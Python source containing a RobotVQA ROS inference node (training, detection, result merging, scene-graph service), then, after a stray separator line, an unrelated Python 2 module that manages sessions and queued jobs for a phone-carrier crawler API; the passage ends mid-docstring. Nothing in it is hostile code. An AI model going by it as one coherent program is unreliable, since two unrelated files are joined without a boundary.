            #Start Inference
            self.inference(self.train_set,result_path=self.result_path)
            #service
            self.getSceneGraph=rospy.Service(self.server_name, GetSceneGraph, self.syncImageProcessing)
            #subscribers
            topic=rospy.get_param('input_topic','/RoboSherlock/input_image')
            self.sub = rospy.Subscriber(topic,self.color_hints[self.color_hint],self.asyncImageProcessing)
            rospy.loginfo('\nTaskManager started successfully\n')
            rospy.logwarn('\nWaiting for images ... '+str(topic)+'\n')
        except Exception as e:
            # NOTE(review): rospy.loginfo is given several positional args
            # here; they are treated as %-format args for a format-free
            # string, so the message will not render as intended — consider
            # one concatenated string.
            rospy.loginfo('\n Starting TaskManager failed: ',e.args[0],'\n')
            sys.exit(-1)
    ###################################################################
    def resize(self,images,meanSize1,meanSize2):
        """Resize each image to (meanSize1, meanSize2) and return the list
        of uint8 results; the interpolation mode depends on whether the
        image is enlarged or shrunk.  On failure the (possibly partial)
        list built so far is returned."""
        normImages=[]
        try:
            for i in range(len(images)):
                # INTER_LINEAR when enlarging, INTER_AREA when shrinking
                if(images[i].shape[0]*images[i].shape[1]<meanSize1*meanSize2):
                    normImages.append(np.array(cv2.resize(images[i].copy(),(meanSize1,meanSize2),
                    interpolation=cv2.INTER_LINEAR),dtype='uint8'))#enlarge
                else:
                    normImages.append(np.array(cv2.resize(images[i].copy(),(meanSize1,meanSize2),
                    interpolation=cv2.INTER_AREA),dtype='uint8'))#shrink
            rospy.loginfo('Resizing of images successful')
        except:
            # NOTE(review): bare except deliberately keeps this best-effort
            rospy.logwarn('Failed to normalize/resize dataset')
        return normImages
    ###################################################################
    def cleanup(self):
        """rospy shutdown hook."""
        rospy.logwarn('Shutting down RobotVQA node ...')
    ###################################################################
    def showImages(self):
        """Display the latest annotated image; ESC (27) closes the window.
        Spins on self.mutex/self.mutex2 to coordinate with the topic
        callback, pumping cv2 GUI events while waiting."""
        k=0
        while self.mutex.testandset():
            pass
        if len(self.currentImage)>0:
            cv2.imshow("Streaming-World",self.currentImage)
            while True:
                # pump GUI events while waiting for mutex2
                while self.mutex2.testandset():
                    k = cv2.waitKey(1) & 0xFF
                if k==27:
                    cv2.destroyWindow("Streaming-World")
                if not self.wait:
                    break
                self.mutex2.unlock()
        self.mutex.unlock()
    ###################################################################
    def getDataset(self,folder=[DatasetClasses.DATASET_FOLDER], imgNameRoot=DatasetClasses.LIT_IMAGE_NAME_ROOT, annotNameRoot=DatasetClasses.ANNOTATION_IMAGE_NAME_ROOT,depthNameRoot=DatasetClasses.DEPTH_IMAGE_NAME_ROOT,binary_dataset=os.path.join(DatasetClasses.DATASET_FOLDER,DatasetClasses.DATASET_BINARY_FILE), with_depth=True,high_depth=True):
        """Load the dataset from its pickled binary form when available,
        otherwise rebuild it from raw images and JSON annotations.
        Returns None when both paths fail.
        NOTE(review): mutable default 'folder=[...]' — appears never
        mutated here, but worth confirming."""
        try:
            with open(binary_dataset,'rb') as f:
                return pickle.load(f)
        except Exception as exc:
            # binary file missing/unreadable: rebuild from the raw dataset
            try:
                dataset=ExtendedDatasetLoader()
                dataset.register_images(folder,imgNameRoot,annotNameRoot,depthNameRoot,self.config,with_depth=with_depth,high_depth=high_depth)
                dataset.prepare()
                return dataset
            except Exception as e:
                rospy.logerr('Dataset creation failed: '+str(e))
                return None
    ###################################################################
    def visualize_dataset(self,dataset,nbImages):
        """Show masks of nbImages randomly chosen dataset images."""
        try:
            image_ids = np.random.choice(dataset.image_ids, nbImages)
            for image_id in image_ids:
                image = dataset.load_image(image_id,0)[:,:,:3]
                mask, class_ids = dataset.load_mask(image_id)
                visualize.display_top_masks(image, mask, class_ids, dataset.class_names)
        except Exception as e:
            rospy.logerr('Error-Could not visualize dataset: '+str(e))
    ###################################################################
    def train(self,train_set,val_set,init_with='last',depth='float32',op_type='training'):
        """Train RobotVQA end-to-end.
        init_with: 'imagenet', 'coco' or 'last' — source of initial weights.
        op_type: training or validation.  self.config should be adequately
        set for training before calling."""
        model = modellib.RobotVQA(mode="training", config=self.config,
                                  model_dir=self.MODEL_DIR)
        self.model=model
        #Weights initialization imagenet, coco, or last
        if init_with == "imagenet":
            model_path=model.get_imagenet_weights()
            model.load_weights(model_path, by_name=True)
        elif init_with == "coco":
            # Load weights trained on MS COCO, but skip layers that
            # are different due to the different number of classes
            # See README for instructions to download the COCO weights
            model_path=self.ROBOTVQA_WEIGHTS_PATH
            model.load_weights(model_path, by_name=True,
                               exclude=ExtendedRobotVQAConfig.EXCLUDE)
        elif init_with == "last":
            # Load the last model you trained and continue training
            model_path=model.find_last()[1]
            model.load_weights(model_path, by_name=True)
        # NOTE(review): model_path is unbound if init_with is none of the
        # three expected values — the loginfo below would then raise.
        rospy.loginfo('Weights loaded successfully from '+str(model_path))
        #Train progressively all the segments of the networks
        #Training loop
        model.train(train_set, val_set,learning_rate=self.config.LEARNING_RATE, epochs=self.config.NUM_EPOCHS,layers='all',depth=depth,op_type=op_type)
        #save weights after training
        model_path = os.path.join(self.MODEL_DIR, "robotVQA.h5")
        model.keras_model.save_weights(model_path)
        rospy.loginfo('Training terminated successfully!')
    ###################################################################
    def inference(self,dst,init_with='last',result_path=None):
        """Build the inference-mode model and load its weights
        (init_with: 'imagenet', 'coco' or 'last')."""
        #set config for inference properly
        self.config.GPU_COUNT = 1
        self.config.IMAGES_PER_GPU = 1
        self.model = modellib.RobotVQA(mode="inference",config=self.config,model_dir=self.MODEL_DIR)
        #Weights initialization imagenet, coco, or last
        if init_with == "imagenet":
            model_path=self.model.get_imagenet_weights()
            self.model.load_weights(model_path, by_name=True,exclude=ExtendedRobotVQAConfig.EXCLUDE)
        elif init_with == "coco":
            # Load weights trained on MS COCO, but skip layers that
            # are different due to the different number of classes
            # See README for instructions to download the COCO weights
            model_path=self.ROBOTVQA_WEIGHTS_PATH
            self.model.load_weights(model_path, by_name=True,
                                    exclude=ExtendedRobotVQAConfig.EXCLUDE)
        elif init_with == "last":
            # Load the last model you trained and continue training
            model_path=self.model.find_last()[1]
            self.model.load_weights(model_path, by_name=True)
        # pre-build the Keras predict function so it can be called from
        # ROS callback threads
        self.model.keras_model._make_predict_function()
        rospy.loginfo('Weights loaded successfully from '+str(model_path))
    ###################################################################
    # NOTE(review): the triple-quoted block below is dead code — the older
    # single-image version of asyncImageProcessing, disabled by quoting.
    """
    def asyncImageProcessing(self,image):
        try:
            if self.counter<self.frequency:
                self.counter+=1
            else:
                self.counter=0
                while self.mutex2.testandset():
                    pass
                self.wait=False
                self.mutex2.unlock()
                while self.mutex.testandset():
                    pass
                dst=self.train_set
                self.currentImage = self.bridge.imgmsg_to_cv2(image, self.cvMode)
                while self.mutex3.testandset():
                    pass
                self.currentImage1=self.currentImage[:]
                self.mutex3.unlock()
                b=self.currentImage[:,:,0].copy()
                self.currentImage[:,:,0]=self.currentImage[:,:,2].copy()
                self.currentImage[:,:,2]=b.copy()
                self.currentImage = self.resize([self.currentImage],self.iwidth,self.iheight)[0]
                cv2.imwrite(self.TempImageFile,self.currentImage)
                rospy.loginfo('Buffering of current image successful')
                image = utils.load_image(self.TempImageFile,None,self.config.MAX_CAMERA_CENTER_TO_PIXEL_DISTANCE)
                #predict
                rospy.logwarn(image.shape)
                results = self.model.detect([image], verbose=0)
                r=results[0]
                class_ids=[r['class_cat_ids'],r['class_col_ids'],r['class_sha_ids'],r['class_mat_ids'],r['class_opn_ids'],r['class_rel_ids']]
                scores=[r['scores_cat'],r['scores_col'],r['scores_sha'],r['scores_mat'],r['scores_opn'],r['scores_rel']]
                visualize.display_instances(image[:,:,:3], r['rois'], r['masks'], class_ids, dst.class_names,r['poses'],[],[],get_ax(cols=2), scores=scores,\
                title='Object description',title1='Object relationships',result_path=self.result_path+'/'+self.TempImageFile)
                resImage=cv2.imread(self.result_path+'/'+self.TempImageFile)
                if(len(resImage)>0):
                    self.currentImage =resImage.copy()
                #self.currentImage = self.resize([self.currentImage],self.width,self.height)[0]
                #self.showImages()
                rospy.loginfo('Inference terminated!!!')
                self.wait=True
                self.mutex.unlock()
        except Exception as e:
            rospy.logwarn(' Failed to buffer image '+str(e))
    """
    ###################################################################
    def asyncImageProcessing(self,image):
        """Image-topic callback: every self.frequency-th frame, run the
        detector, merge the per-variant results and refresh
        self.currentImage with the rendered scene graph."""
        try:
            if self.counter<self.frequency:
                self.counter+=1
            else:
                self.counter=0
                while self.mutex2.testandset():
                    pass
                self.wait=False
                self.mutex2.unlock()
                while self.mutex.testandset():
                    pass
                dst=self.train_set
                self.currentImage = self.bridge.imgmsg_to_cv2(image, self.cvMode)
                while self.mutex3.testandset():
                    pass
                self.currentImage1=self.currentImage[:]
                self.mutex3.unlock()
                # swap the R and B channels
                b=self.currentImage[:,:,0].copy()
                self.currentImage[:,:,0]=self.currentImage[:,:,2].copy()
                self.currentImage[:,:,2]=b.copy()
                self.currentImage = self.resize([self.currentImage],self.iwidth,self.iheight)[0]
                cv2.imwrite(self.TempImageFile,self.currentImage)
                rospy.loginfo('Buffering of current image successful')
                image = utils.load_image(self.TempImageFile,None,self.config.MAX_CAMERA_CENTER_TO_PIXEL_DISTANCE)
                #predict
                rospy.logwarn(image.shape)
                # channel-permuted variants for test-time augmentation;
                # currently disabled (only the original image is used below)
                R=image[:,:,0].copy()
                G=image[:,:,1].copy()
                B=image[:,:,2].copy()
                image0=np.stack((R.copy()*0,G.copy(),B.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image0=np.flip(image,0)
                image1=np.stack((R.copy(),B.copy(),G.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image1=np.flip(image,1)
                image2=np.stack((B.copy(),G.copy(),R.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image2=np.flip(image1,0)
                image3=np.stack((B.copy(),R.copy(),G.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image3=np.flip(image0,1)
                image4=np.stack((G.copy(),R.copy(),B.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image4=self.resize([np.rot90(image,1)],self.iwidth,self.iheight)[0]
                image5=np.stack((G.copy(),B.copy(),R.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image5=self.resize([np.rot90(image,3)],self.iwidth,self.iheight)[0]
                image6=np.stack((R.copy(),G.copy()*0,B.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image6=image-30
                image7=np.stack((R.copy(),G.copy(),B.copy()*0,image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image7=image+30
                #images=[image0.copy(),image1.copy(),image2.copy(),image3.copy(),image.copy(),image4.copy(),image5.copy(),image6.copy(),image7.copy()]
                images=[image]
                rImages=[]
                main_ax=get_ax(cols=2)
                main_mask=[]
                main_back=[]
                list_results=[]
                merge_results={"class_ids":[],"scores":[],"boxes":[],"poses":[],"masks":[]}
                # serialize access to the Keras model
                while self.mutex4.testandset():
                    pass
                for image in images:
                    results = self.model.detect([image], verbose=0)
                    list_results.append(results)
                    r=results[0]
                    class_ids=[r['class_cat_ids'],r['class_col_ids'],r['class_sha_ids'],r['class_mat_ids'],r['class_opn_ids'],r['class_rel_ids']]
                    scores=[r['scores_cat'],r['scores_col'],r['scores_sha'],r['scores_mat'],r['scores_opn'],r['scores_rel']]
                    merge_results["class_ids"].append(class_ids)
                    merge_results["scores"].append(scores)
                    merge_results["boxes"].append(r['rois'])
                    merge_results["poses"].append(r['poses'])
                    merge_results["masks"].append(r['masks'])
                    # visualize.display_instances(image[:,:,:3], r['rois'], r['masks'], class_ids, dst.class_names,r['poses'],[],[],get_ax(cols=2), scores=scores,\
                    # title='Object description',title1='Object relationships',result_path=self.result_path+'/'+self.TempImageFile)
                self.mutex4.unlock()
                rospy.loginfo("****************************** BEGIN MERGING **************************************************")
                listOfObjects,spatialRelations=self.merge_results_fct(merge_results,dst.class_names)
                print(listOfObjects,spatialRelations)
                rospy.loginfo("****************************** END MERGING **************************************************")
                visualize.display_instances_v2(images[0][:,:,:3], listOfObjects, spatialRelations,main_ax,score=True,title="",title1='',
                figsize=(16, 16),result_path=self.result_path+'/'+self.mainTempImageFile)
                #for i in range(len(list_results)):
                #    results=list_results[i]
                #    image=images[i]
                #    r=results[0]
                #    class_ids=[r['class_cat_ids'],r['class_col_ids'],r['class_sha_ids'],r['class_mat_ids'],r['class_opn_ids'],r['class_rel_ids']]
                #    scores=[r['scores_cat'],r['scores_col'],r['scores_sha'],r['scores_mat'],r['scores_opn'],r['scores_rel']]
                #    visualize.display_instances(image[:,:,:3], r['rois'], r['masks'], class_ids, dst.class_names,r['poses'],[],[],get_ax(cols=2), scores=scores,\
                #    title='Object description',title1='Object relationships',result_path=self.result_path+'/'+self.TempImageFile)
                #    rImages.append(self.resize([cv2.imread(self.result_path+'/'+self.TempImageFile)],self.width/3,self.height/3)[0])
                #rImages.append(self.resize([cv2.imread(self.result_path+'/'+self.mainTempImageFile)],3*(self.width/3),3*(self.height/3))[0])
                #resImage=np.concatenate(( np.concatenate((rImages[0],rImages[1],rImages[4]),axis=0) , np.concatenate((rImages[2],rImages[3],rImages[7]),axis=0),np.concatenate((rImages[5],rImages[6],rImages[8]),axis=0) ),axis=1)
                #resImage= rImages[0].copy()
                resImage=cv2.imread(self.result_path+'/'+self.mainTempImageFile)
                if(len(resImage)>0):
                    self.currentImage =resImage.copy()
                #self.currentImage = self.resize([self.currentImage],self.width,self.height)[0]
                #self.showImages()
                rospy.loginfo('Inference terminated!!!')
                self.wait=True
                self.mutex.unlock()
        except Exception as e:
            rospy.logwarn(' Failed to buffer image '+str(e))
    ################################################################################################
    def IOU(self,r1,r2):
        """Intersection-over-union of two boxes given as (y1,x1,y2,x2).
        Returns int 0 for degenerate (zero-area) boxes and 0.0 when the
        boxes do not overlap."""
        y1,x1,y2,x2=map(float,r1)
        yp1,xp1,yp2,xp2=map(float,r2)
        if abs(x1-x2)==0 or abs(y1-y2)==0 or abs(xp1-xp2)==0 or abs(yp1-yp2)==0:
            return 0
        if yp1>=y2 or y1>=yp2 or xp1>=x2 or x1>=xp2:
            return 0.0 #no intersection
        # four cases depending on which box starts first in y and x;
        # each returns intersection/(area1+area2-intersection)
        if y1>=yp1:
            if x1<=xp1:
                return (abs(y1-min([y2,yp2]))*abs(xp1-min([x2,xp2])))/(abs(x1-x2)*abs(y1-y2)+abs(xp1-xp2)*abs(yp1-yp2)-abs(y1-min([y2,yp2]))*abs(xp1-min([x2,xp2])))
            else:
                return (abs(y1-min([y2,yp2]))*abs(x1-min([x2,xp2])))/(abs(x1-x2)*abs(y1-y2)+abs(xp1-xp2)*abs(yp1-yp2)-abs(y1-min([y2,yp2]))*abs(x1-min([x2,xp2])))
        if yp1>=y1:
            if xp1<=x1:
                return (abs(yp1-min([yp2,y2]))*abs(x1-min([xp2,x2])))/(abs(xp1-xp2)*abs(yp1-yp2)+abs(x1-x2)*abs(y1-y2)-abs(yp1-min([yp2,y2]))*abs(x1-min([xp2,x2])))
            else:
                return (abs(yp1-min([yp2,y2]))*abs(xp1-min([xp2,x2])))/(abs(xp1-xp2)*abs(yp1-yp2)+abs(x1-x2)*abs(y1-y2)-abs(yp1-min([yp2,y2]))*abs(xp1-min([xp2,x2])))
    ################################################################################################
    def merge_results_fct(self,results,class_names,mainSource=0):
        """Merge per-image detection results into a single object list plus
        a spatial-relation matrix.

        Detections across result sets are clustered by box IOU, each
        cluster is collapsed into one object (per-attribute argmax over
        scores), and relations are re-indexed onto the clusters.
        NOTE(review): relies on Python 2 semantics — map()/filter() return
        lists that are indexed and concatenated; under Python 3 these are
        iterators and this function would need list() wrappers.
        """
        listOfObjects=[]
        #get all objects
        n=len(results["class_ids"])
        m=max([-1]+map((lambda x:x.shape[0]),results["poses"]))
        if m<0:
            m=0
        mapObjectTocluster=np.zeros([n,m],dtype="int")
        for i in range(len(results["class_ids"])):
            for j in range(results["poses"][i].shape[0]):
                listOfObjects.append({"cat":(results["class_ids"][i][0][j],results["scores"][i][0][j]),
                                      "col":(results["class_ids"][i][1][j],results["scores"][i][1][j]),
                                      "sha":(results["class_ids"][i][2][j],results["scores"][i][2][j]),
                                      "mat":(results["class_ids"][i][3][j],results["scores"][i][3][j]),
                                      "opn":(results["class_ids"][i][4][j],results["scores"][i][4][j]),
                                      "poses":results["poses"][i][j],
                                      "boxes":results["boxes"][i][j],
                                      "masks":results["masks"][i][:, :, j],
                                      "source":i,
                                      "position":j
                                      }
                                     )
        clusters=[]
        listOfclusters=[]
        #cluster the set of objects
        while listOfObjects!=[]:
            cluster=listOfObjects[0]
            del clusters[:]
            for elem in listOfObjects:
                distance= self.IOU(cluster["boxes"],elem["boxes"])
                rospy.loginfo(str(cluster["boxes"])+" "+str(elem["boxes"])+" distance:"+str(distance))
                # different categories need the larger IOU threshold
                if (distance >= self.config.CLUSTER_RADIUS and cluster["cat"][0]!=elem["cat"][0]) or (distance >= self.config.CLUSTER_RADIUS1 and cluster["cat"][0]==elem["cat"][0]):
                    mapObjectTocluster[elem["source"]][elem["position"]]=len(listOfclusters)
                    clusters.append(elem)
            for elem in clusters:
                listOfObjects.remove(elem)
            listOfclusters.append(clusters[:])
        #merging clusters into objects
        del listOfObjects[:]
        for cluster in listOfclusters:
            catVal=map((lambda x: x["cat"][0]),cluster)
            catProb=map((lambda x: x["cat"][1]),cluster)
            argmaxCat=catVal[np.argmax(catProb)]
            # map per-source color vocabularies back to canonical color names
            colorList=np.concatenate(map((lambda x: filter((lambda y: DatasetClasses.CVTCOLOR[1][x["source"]][y]==class_names[1][x["col"][0]]), DatasetClasses.CVTCOLOR[1][x["source"]].keys())),cluster))
            colVal=map((lambda x: x["col"][0]),cluster)
            colProb=map((lambda x: x["col"][1]),cluster)
            if list(colorList)!=[]:
                # majority vote over the canonical color names
                argmaxCol=max(set(list(colorList)),key=list(colorList).count)
            else:
                argmaxCol=class_names[1][colVal[np.argmax(colProb)]]
            shaVal=map((lambda x: x["sha"][0]),cluster)
            shaProb=map((lambda x: x["sha"][1]),cluster)
            argmaxSha=shaVal[np.argmax(shaProb)]
            matVal=map((lambda x: x["mat"][0]),cluster)
            matProb=map((lambda x: x["mat"][1]),cluster)
            argmaxMat=matVal[np.argmax(matProb)]
            opnVal=map((lambda x: x["opn"][0]),cluster)
            opnProb=map((lambda x: x["opn"][1]),cluster)
            argmaxOpn=opnVal[np.argmax(opnProb)]
            # average poses and boxes over the cluster
            poseVal=map((lambda x: x["poses"]),cluster)
            poseVal=sum(poseVal)/len(poseVal)
            boxVal=map((lambda x: x["boxes"]),cluster)
            boxVal=sum(boxVal)*1.0/len(boxVal)
            maskVal=map((lambda x: x["masks"]),cluster)
            # NOTE(review): divisor is len(boxVal) (always 4 coordinates),
            # not len(maskVal) — confirm whether this is intentional.
            maskVal=np.array(np.ceil(sum(maskVal)*1.0/len(boxVal)),dtype="uint8")
            listOfObjects.append({ "cat":(class_names[0][argmaxCat],np.max(catProb)),
                                   "col":(argmaxCol,np.max(colProb)),
                                   "sha":(class_names[2][argmaxSha],np.max(shaProb)),
                                   "mat":(class_names[3][argmaxMat],np.max(matProb)),
                                   "opn":(class_names[4][argmaxOpn],np.max(opnProb)),
                                   "poses":(poseVal,1.),
                                   "boxes":(boxVal,1.),
                                   "masks":(maskVal,1.),
                                   "source":(mainSource,1.)
                                   }
                                 )
        rospy.loginfo("Return merged objects: "+str(len(listOfObjects))+" objects")
        #spatial relationship resolution
        spatialRelations=(np.array([["BG"]*len(listOfObjects) for i in range(len(listOfObjects))],dtype="|S5"),np.ones([len(listOfObjects),len(listOfObjects)],dtype="float"))
        for i in range(len(results["class_ids"])):
            for j in range(results["poses"][i].shape[0]):
                for k in range(results["poses"][i].shape[0]):
                    spatialRelations[0][mapObjectTocluster[i][j]][mapObjectTocluster[i][k]]=class_names[5][results["class_ids"][i][5][j][k]]
                    spatialRelations[1][mapObjectTocluster[i][j]][mapObjectTocluster[i][k]]=results["scores"][i][5][j][k]
        del listOfclusters[:]
        return listOfObjects,spatialRelations
    ################################################################################################
    def syncImageProcessing(self,request):
        """get_scene_graph service handler: run the detector on
        request.query and return the rendered scene graph; returns an empty
        GetSceneGraphResponse on failure."""
        try:
            image = self.bridge.imgmsg_to_cv2(request.query, self.cvMode)
            # swap the R and B channels
            b=image[:,:,0].copy()
            image[:,:,0]=image[:,:,2].copy()
            image[:,:,2]=b.copy()
            image = self.resize([image],self.iwidth,self.iheight)[0]
            cv2.imwrite(self.TempImageFile1,image)
            rospy.loginfo('Buffering of current image successful')
            image = utils.load_image(self.TempImageFile1,None,self.config.MAX_CAMERA_CENTER_TO_PIXEL_DISTANCE)
            dst=self.train_set
            #predict
            rospy.logwarn(image.shape)
            # channel-permuted variants for test-time augmentation;
            # currently disabled (only the original image is used below)
            R=image[:,:,0].copy()
            G=image[:,:,1].copy()
            B=image[:,:,2].copy()
            image0=np.stack((R.copy()*0,G.copy(),B.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image0=np.flip(image,0)
            image1=np.stack((R.copy(),B.copy(),G.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image1=np.flip(image,1)
            image2=np.stack((B.copy(),G.copy(),R.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image2=np.flip(image1,0)
            image3=np.stack((B.copy(),R.copy(),G.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image3=np.flip(image0,1)
            image4=np.stack((G.copy(),R.copy(),B.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image4=self.resize([np.rot90(image,1)],self.iwidth,self.iheight)[0]
            image5=np.stack((G.copy(),B.copy(),R.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image5=self.resize([np.rot90(image,3)],self.iwidth,self.iheight)[0]
            image6=np.stack((R.copy(),G.copy()*0,B.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image6=image-30
            image7=np.stack((R.copy(),G.copy(),B.copy()*0,image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image7=image+30
            #images=[image0.copy(),image1.copy(),image2.copy(),image3.copy(),image.copy(),image4.copy(),image5.copy(),image6.copy(),image7.copy()]
            images=[image.copy()]
            rImages=[]
            main_ax=get_ax(cols=2)
            main_mask=[]
            main_back=[]
            list_results=[]
            merge_results={"class_ids":[],"scores":[],"boxes":[],"poses":[],"masks":[]}
            # serialize access to the Keras model
            while self.mutex4.testandset():
                pass
            for image in images:
                results = self.model.detect([image], verbose=0)
                list_results.append(results)
                r=results[0]
                class_ids=[r['class_cat_ids'],r['class_col_ids'],r['class_sha_ids'],r['class_mat_ids'],r['class_opn_ids'],r['class_rel_ids']]
                scores=[r['scores_cat'],r['scores_col'],r['scores_sha'],r['scores_mat'],r['scores_opn'],r['scores_rel']]
                merge_results["class_ids"].append(class_ids)
                merge_results["scores"].append(scores)
                merge_results["boxes"].append(r['rois'])
                merge_results["poses"].append(r['poses'])
                merge_results["masks"].append(r['masks'])
            self.mutex4.unlock()
            rospy.loginfo("****************************** BEGIN MERGING **************************************************")
            listOfObjects,spatialRelations=self.merge_results_fct(merge_results,dst.class_names)
            print(listOfObjects,spatialRelations)
            rospy.loginfo("****************************** END MERGING **************************************************")
            scenegraph=visualize.display_instances_v3(images[0][:,:,:3], listOfObjects, spatialRelations,main_ax,score=True,title="",title1='',
            figsize=(16, 16),result_path=self.result_path+'/'+self.TempImageFile1)
            rospy.loginfo('Inference terminated!!!')
            return scenegraph
        except Exception as e:
            rospy.logwarn(' Failed to buffer image '+str(e))
            return GetSceneGraphResponse()
###################################################################################################
if __name__=="__main__":
    try:
        # Start the model loader / task manager node.
        tkm=TaskManager()
        # Display loop until ROS shuts down (spin not used because images
        # must be shown from the main thread).
        #rospy.spin()
        while not rospy.is_shutdown():
            tkm.showImages()
    except Exception as e:
        rospy.logwarn('Shutting down RobotVQA node ...'+str(e))
| |
# -*- coding:utf-8 -*-
import os
import re
import time
import codecs
import traceback
from mrq.job import queue_job, get_job_result, Job
import setting.api_config as config
from setting.status_code import STATUS_CODE
from com.connection import db
from com.redis_conn import redis_instance
def get_tel_info(tel_prefix):
    """Look up telecom/province/city for a phone-number prefix in redis.

    Returns {} when the prefix is unknown.
    """
    raw = redis_instance.get(tel_prefix)
    if not raw:
        return {}
    parts = raw.split(',')
    return {'telecom': parts[0], 'province': parts[1], 'city': parts[2]}
def tel_loc_info(tel):
    """Resolve location and telecom flow info for a full phone number.

    Returns {} for an unknown prefix or on any lookup error (best effort).
    """
    try:
        # The first 7 digits identify the carrier/region.
        tel_prefix = tel[:7]
        tel_info = get_tel_info(tel_prefix)
        if not tel_info:
            return {}
        telecom = tel_info['telecom'].decode('utf8')
        tel_info.update(config.TELECOM_FLOW_INFO[telecom])
        return tel_info
    except Exception:
        # FIX: was a bare `except:` which also swallowed SystemExit and
        # KeyboardInterrupt; keep the best-effort contract but only for
        # ordinary exceptions.
        return {}
def pass_crawler_params(sid, action, params):
    """Upsert the crawler parameters for *sid*.

    receive=False flags the record as not yet consumed by the crawler.
    Returns the pymongo update result.
    """
    update_data = {'sid': sid, 'action': action, 'receive': False,
                   'parameters': params}
    ret = db['params'].update_one({'sid':sid}, {'$set':update_data}, upsert=True)
    return ret
def init_sid_info():
    """Ensure the unique index on sid_info.sid exists; True on success."""
    try:
        db['sid_info'].create_index(('sid'), unique=True)
    except:
        print traceback.format_exc()
        return False
    return True
def get_sid_info(sid):
    """Fetch the session record for *sid*, flagging and refreshing expiry.

    Returns {} for an unknown sid. Otherwise annotates the record with
    ret['is_expired']; a still-live session has its expire_time pushed
    forward by SID_EXPIRE_TIME.
    """
    record = db['sid_info'].find_one({'sid': sid})
    if not record:
        return {}
    now = int(time.mktime(time.localtime()))
    if now > record['expire_time']:
        record['is_expired'] = True
    else:
        record['is_expired'] = False
        db['sid_info'].update_one(
            {'sid': sid},
            {'$set': {'expire_time': now + config.SID_EXPIRE_TIME}})
    return record
def set_sid_info(sid, tel, tel_info):
    """Create the initial session record for *sid*/*tel*.

    Seeds status=1 ('start to crawl') and an expiry SID_EXPIRE_TIME from
    now; *tel_info* fields (telecom/province/city/...) are merged in.
    Returns False (with a traceback printed) on insert failure.
    """
    timestamp = int(time.mktime(time.localtime()))
    insert_data = {
        'sid': sid,
        'tel': tel,
        'start_time': timestamp,
        'status': 1,
        'message': 'start to crawl',
        'end_time': timestamp,
        'expire_time': timestamp + config.SID_EXPIRE_TIME
    }
    insert_data.update(tel_info)
    try:
        db['sid_info'].insert_one(insert_data)
    except:
        print traceback.format_exc()
        return False
    return True
def undo_sid_info(sid,tel):
    """Delete all records (sid_info, state, params) for a sid/tel pair.

    Returns True when a matching sid_info record existed and was removed,
    False otherwise or on any database error.
    """
    try:
        ret=db['sid_info'].find_one({'sid':sid,'tel':tel})
        if ret:
            # Job cancellation via mrq was intentionally disabled here.
            ret=db['sid_info'].remove({'sid':sid,'tel':tel})
            ret = db['state'].find_one({'sid': sid})
            if ret:
                ret=db['state'].remove({'sid':sid})
            ret=db['params'].find_one({'sid':sid})
            if ret:
                ret=db['params'].remove({'sid':sid})
            #init state
            return True
        return False
    except:
        print traceback.format_exc()
        return False
def send_crawl_task(sid, tel, flow_type, province, city, timeout=5, sleep_time=1):
    """Queue a crawl job for *sid* unless a crawler is already alive.

    Returns True when the job was queued and its id stored on the sid
    record, False when a crawler exists or the queued id looks invalid.
    NOTE(review): `timeout` and `sleep_time` are currently unused —
    confirm whether they were meant to gate a polling loop.
    """
    alive = check_crawler_alive(sid)
    if alive:
        return False
    else:
        # send job queue to start crawler
        params = {
            'sid': sid,
            'tel': tel,
            'flow_type': flow_type,
            'province': province,
            'city': city
        }
        job_id = queue_job(config.TASK_PATH, params, queue=config.QUEUE_NAME)
        # Presumably a valid mrq job id is longer than 11 chars — verify.
        if len(str(job_id))>11:
            db['sid_info'].update_one(
                {'sid': sid}, {'$set': {'job_id':job_id}}, upsert=True)
            return True
        else:
            return False
# db communicate util
# def check_sid_used(sid, tel):
# mongo_config = _DB_CONFIG['sid']
# client = pymongo.MongoClient(mongo_config['host'], mongo_config['port'])
# c = client[mongo_config['db']][mongo_config['collection']]
# ret = c.find_one({'sid': sid})
# if ret or ret.get('tel', '') != tel:
# return False
# return True
def check_crawler_alive(sid):
    """True when a crawler state record exists for *sid*."""
    return bool(db['state'].find_one({'sid': sid}))
def check_login_state(sid, timeout=config.STATE_TIME_OUT, sleep_time=config.STEP_TIME):
    """Poll the crawler state until login resolves or *timeout* elapses.

    Returns (True, state) when the crawler reaches 'Crawl' or
    'Wait Code Request', (False, state) when the state contains 'Failed',
    and (False, {}) after the polling budget is exhausted.
    """
    attempts = int(timeout / sleep_time)
    for _ in range(attempts):
        state = db['state'].find_one({'sid': sid})
        if state:
            name = state['state']
            if name in ('Crawl', 'Wait Code Request'):
                return True, state
            if 'Failed' in name:
                return False, state
        time.sleep(sleep_time)
    return False, {}
#def check_crawler_state(sid, states, timeout=5, sleep_time=0.5):
def check_crawler_state(sid, timeout=config.STATE_TIME_OUT, sleep_time=config.STEP_TIME):
    """Poll for a fresh (receive=False) state document for *sid*.

